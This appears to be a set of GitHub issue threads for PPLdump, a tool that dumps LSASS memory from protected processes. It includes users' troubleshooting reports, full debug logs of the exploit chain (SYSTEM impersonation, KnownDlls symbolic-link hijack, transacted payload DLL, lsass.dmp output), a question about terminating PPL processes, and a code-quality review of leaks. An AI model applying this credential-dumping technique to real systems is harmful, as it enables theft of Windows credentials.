The payload DLL was not loaded, the program is running as Administrator and Im pretty sure architecture match and AV is not the problem. I also tested the program at Windows 10 v21H2 Build 19044.1288 and its still working fine.

Tested on Windows 10 2004 (OS Build 19041.264).

Hi, when I try to run the code first time, there are no errors but it only runs as far as:

"The Symbolic link was successfully created:: '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll' and no output is produced, but no further error?

If I try to re-run I get: DefineDosDevice failed with error code 183 - Cannot create a file when that file already exists.

This clears after a reboot, but is there a way to clear this error without rebooting?

Can you advise on this?

Thanks.

Hi, thanks for your research and for writing this util! I played with the code, and was wondering whether if except for getting a memory dump it would be possible to kill a remote PPL protected process.

I tried to add a simple TerminateProcess call (with the handle of the remote process) at dllexploit.cpp but received an "access denied" error. I was wondering if I am doing something conceptually wrong? I expected that a PPL process will be able to terminate another PPL process.

Hey mate, awesome work! Is your code under any license (free like bsd, or otherwise)?

I'd like to make use of your PPL-injecting code alongside another open source project of mine, but I wanted to make sure that apart from giving you and your dope work every kudos/acknowledgement I can, there's no sorta legal issue with it.

I'm going to release a project based on PPLDump next week, but my company's legal department won't let me do so without a clear license on PPLDump. I picked MIT because it seems in line with the spirit of your tweet.

I'm happy to pick another license if you prefer.

I use VS 2022 to build project After excute, I get error

[*] Found a process with name 'lsass' and PID 1020
[-] Process with ID 1020 is not a PPL
[*] Requirements OK
[*] DLL to hijack: EventAggregation.dll
[*] Impersonating SYSTEM...
[*] Created Object Directory: '\GLOBAL??\KnownDlls'
[*] Created Symbolic link: '\GLOBAL??\KnownDlls\EventAggregation.dll'
[*] Created symbolic link: '\??\GLOBALROOT -> \GLOBAL??'
[*] DefineDosDevice OK
[*] Impersonating SYSTEM...
[+] The symbolic link was successfully created: '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll'
[*] Mapped payload DLL to: '\KernelObjects\EventAggregation.dll'
[*] Started protected process, waiting...
[-] The DLL was loaded but something went wrong. :/

Successfully compiled the code and ran from an admin terminal with debug but didn't get the expected extraction of lsass.dmp. Everything appeared to be working fine up until the last couple of lines. Any thoughts are appreciated!

PS C:\Users\xxxxx\git\PPLdump\x64\Release> .\PPLdump.exe -d -f lsass lsass.dmp [xxxxx] [*] Found a process with name 'lsass' and PID 1180 [DEBUG][xxxxx] Check requirements [DEBUG][xxxxx] Target process protection level: 4 - PsProtectedSignerLsa-Light [xxxxx] [*] Requirements OK [DEBUG][xxxxx] Get the name of the DLL to hijack [xxxxx] [*] DLL to hijack: EventAggregation.dll [xxxxx] [*] Current user is SYSTEM? -> FALSE [DEBUG][xxxxx] Found a potential Process candidate: PID=1152 - Image='LsaIso.exe' - User='NT AUTHORITY\SYSTEM' [DEBUG][xxxxx] This token is not restricted. [DEBUG][xxxxx] Found 2/2 required privileges in token. [DEBUG][xxxxx] Found a valid Token candidate. [SYSTEM] [*] Impersonating SYSTEM... [DEBUG][SYSTEM] Create object directory '\GLOBAL??\KnownDlls'... [SYSTEM] [*] Created Object Directory: '\GLOBAL??\KnownDlls' [DEBUG][SYSTEM] Create symbolic link '\GLOBAL??\KnownDlls\EventAggregation.dll'... [SYSTEM] [*] Created Symbolic link: '\GLOBAL??\KnownDlls\EventAggregation.dll' [DEBUG][xxxxx] Create symbolic link '??\GLOBALROOT -> \GLOBAL??'... [xxxxx] [*] Created symbolic link: '??\GLOBALROOT -> \GLOBAL??' [DEBUG][xxxxx] Call DefineDosDevice to create '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll' [-] DefineDosDevice failed with error code 183 - Cannot create a file when that file already exists. [xxxxx] [*] DefineDosDevice OK [DEBUG][xxxxx] Impersonate SYSTEM again [SYSTEM] [*] Impersonating SYSTEM... [DEBUG][SYSTEM] Check whether the symbolic link was really created in '\KnownDlls' [SYSTEM] [+] The symbolic link was successfully created: '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll' [DEBUG][SYSTEM] Map our DLL to section '\KernelObjects\EventAggregation.dll' [DEBUG][SYSTEM] Loaded payload DLL, image size: 128512 bytes [DEBUG][SYSTEM] Found file for transaction: C:\WINDOWS\system32\appverifUI.dll [DEBUG][SYSTEM] Opened file 'C:\WINDOWS\system32\appverifUI.dll' for transaction. [DEBUG][SYSTEM] Wrote 128512 bytes of embedded payload DLL to transacted file. [SYSTEM] [*] Mapped payload DLL to: '\KernelObjects\EventAggregation.dll' [DEBUG][SYSTEM] Enable privilege SeAssignPrimaryTokenPrivilege [DEBUG][SYSTEM] Create a primary token [DEBUG][SYSTEM] Create protected process with command line: C:\WINDOWS\system32\services.exe 1180 "lsass.dmp" b01c2517-790a-4bec-aa9b-cb576e7f712 -d [SYSTEM] [*] Started protected process, waiting... [DEBUG][SYSTEM] Unmap section '\KernelObjects\EventAggregation.dll'... [DEBUG][SYSTEM] Process exit code: 0 [-] The DLL was not loaded. :/ PS C:\Users\xxxxx\git\PPLdump\x64\Release> ls

HI,

Nice work as always!

I think I might've found one of the potential issues on Windows Server 2012 R2, which causes the [-] DefineDosDevice failed with error code 6 - The handle is invalid. error.

On this 2012 server \KnownDlls\SspiCli.dll already existed and changing the DLL_TO_HIJACK_WIN81 dll to EventAggregation.dll fixed the issue.

Is there any specific reason why you are using SspiCli.dll on 2012 and EventAggregation.dll on Windows 10, as they both seem to get loaded by services.exe?

The security descriptor returned from GetSecurityInfo needs to be freed by the caller:

https://docs.microsoft.com/en-us/windows/win32/api/aclapi/nf-aclapi-getsecurityinfo

A pointer to a variable that receives a pointer to the security descriptor of the object. When you have finished using the pointer, free the returned buffer by calling the LocalFree function.

Some code correctness issues in PPLDump

These are hygiene issues. Some of these are low priority and edge cases.

I initially spotted these in the port of the code here: https://github.com/EspressoCake/PPLDump_BOF/issues/1

and decided to file the bugs upstream here too.

Edge case leak if allocation fails

BOOL TokenCompareSids(PSID pSidA, PSID pSidB)
{
	BOOL bReturnValue = FALSE;
	LPWSTR pwszSidA = NULL;
	LPWSTR pwszSidB = NULL;

	if (ConvertSidToStringSid(pSidA, &pwszSidA) && ConvertSidToStringSid(pSidB, &pwszSidB))
	{
		bReturnValue = _wcsicmp(pwszSidA, pwszSidB) == 0;
		LocalFree(pwszSidA);
		LocalFree(pwszSidB);
	}
	else
! it's possible only one of the calls to ConvertSidToStringSid failed and this branch will leak the Sid for the success case
		PrintLastError(L"ConvertSidToStringSid");

	return bReturnValue;
}

See: https://github.com/itm4n/PPLdump/blob/fa48466247a116dc6f8a29497abb9223c9b4fd14/PPLdump/utils.cpp#L502

There is another case here:

   if (TokenGetSid(hTokenDup, &pSidTmp) && TokenGetUsername(hTokenDup, &pwszUsername))

https://github.com/itm4n/PPLdump/blob/fa48466247a116dc6f8a29497abb9223c9b4fd14/PPLdump/exploit.cpp#L935

Consider calling ADVAPI32!IsTokenRestricted instead of rolling your own function here:

BOOL TokenIsNotRestricted(HANDLE hToken, PBOOL pbIsNotRestricted) {

...

https://github.com/itm4n/PPLdump/blob/fa48466247a116dc6f8a29497abb9223c9b4fd14/PPLdump/utils.cpp#L632

Fail to check if memory was successfully allocated for guid

Check for failed allocation from MiscGenerateGuidString

    MiscGenerateGuidString(&pwszGuid);

https://github.com/itm4n/PPLdump/blob/fa48466247a116dc6f8a29497abb9223c9b4fd14/PPLdump/exploit.cpp#L303

Leak of hCurrentToken token in DumpProcess()

	if (bCurrentUserIsSystem)
	{
		if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ADJUST_PRIVILEGES, &hCurrentToken))
		{
			PrintLastError(L"OpenProcessToken");
			goto end;
		}
	}
	else
	{
		if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ADJUST_PRIVILEGES, FALSE, &hCurrentToken))
		{
			PrintLastError(L"OpenThreadToken");
			goto end;
		}
	}

	PrintDebug(L"Enable privilege %ws\n", SE_ASSIGNPRIMARYTOKEN_NAME);

	if (!TokenCheckPrivilege(hCurrentToken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE))
		goto end;

	PrintDebug(L"Create a primary token\n");

	if (!DuplicateTokenEx(hCurrentToken, MAXIMUM_ALLOWED, NULL, SecurityAnonymous, TokenPrimary, &hNewProcessToken))
	{
		PrintLastError(L"DuplicateTokenEx");
		goto end;
	}
! No call to CloseHandle on hCurrentToken

https://github.com/itm4n/PPLdump/blob/fa48466247a116dc6f8a29497abb9223c9b4fd14/PPLdump/exploit.cpp#L328

Handle of hTransaction leaked in WritePayloadDllTransacted

No call to CloseHandle for hTransaction

	status = NtCreateTransaction(&hTransaction, TRANSACTION_ALL_ACCESS, &oa, NULL, NULL, 0, 0, 0, NULL, NULL);

https://github.com/itm4n/PPLdump/blob/fa48466247a116dc6f8a29497abb9223c9b4fd14/PPLdump/exploit.cpp#L798

FindFileForTransaction leaks memory for pSidTarget

Need a call to LocalFree at function exit for pSidTarget

	PSID pSidTarget = NULL;

	ConvertStringSidToSid(L"S-1-5-18", &pSidTarget);

https://github.com/itm4n/PPLdump/blob/fa48466247a116dc6f8a29497abb9223c9b4fd14/PPLdump/exploit.cpp#L754